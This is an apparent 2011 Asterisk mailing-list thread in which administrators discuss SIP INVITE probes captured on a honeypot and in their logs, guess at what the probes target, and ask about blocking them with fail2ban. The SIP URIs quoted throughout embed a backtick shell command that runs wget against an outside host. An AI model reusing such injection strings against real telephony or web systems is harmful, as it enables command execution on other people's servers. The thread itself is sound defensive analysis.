asterisk users - Sep 2011 - new sort of shell attack attempt via SIP?

I haven't seen this sort of URI/shell attack prior to today but it
looks interesting.  Embedding a backtick in the URI with a wget that
doesn't seem to do much to an empty file.

I'm guessing it is just a probe to see if they can send further
embedded backtick shell commands to my Asterisk instance (by watching
their weblogs @ 91.223.89.94)

(This happens to be my "honeypot" that just accepts all calls and
dumps them into one big Asterisk 10 beta ConfBridge :-)


INVITE
sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE
sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE
sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE
sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE
sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.
INVITE
sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
SIP/2.0.


Does Asterisk have shell injection weakness?  Or perhaps this targets
some other Asterisk config manager that is subject to injection via
URI?

Tom

On 09/11/2011 07:05 PM, Tom Browning wrote:
> INVITE
sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
> SIP/2.0.
My guess is that this attack presumes you are running a web GUI such 
as FreePBX, and that it does not sanitise embedded HTML.  Thus, when 
reviewing your CDRs, for instance, you might click on such a link.

A more sophisticated variant of that would embed <script> tags and a 
with a shortened URL (overall small enough to fit inside a SIP display 
name field or whatnot) to effectuate a cross-site scripting attack.

-- 
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/

I have seen this recently in my logs as well 

[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing
[00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1]
NoOp("SIP/5060-0000002c", "Received incoming SIP connection from
unknown peer to
00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in
new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing
[00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2]
Set("SIP/5060-0000002c",
"DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`")
in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing
[00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3]
Goto("SIP/5060-0000002c", "s,1") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1) 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s at
from-sip-external:1] GotoIf("SIP/5060-0000002c",
"0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1")
in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto
(from-sip-external,//91.223.89.94/V.php`,1)

So can this be blocked via fail2ban and by adding a new REGEX ? 


Thanks 

Saqib 


-- 
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
<http://lists.digium.com/pipermail/asterisk-users/attachments/20110912/48241f85/attachment.htm>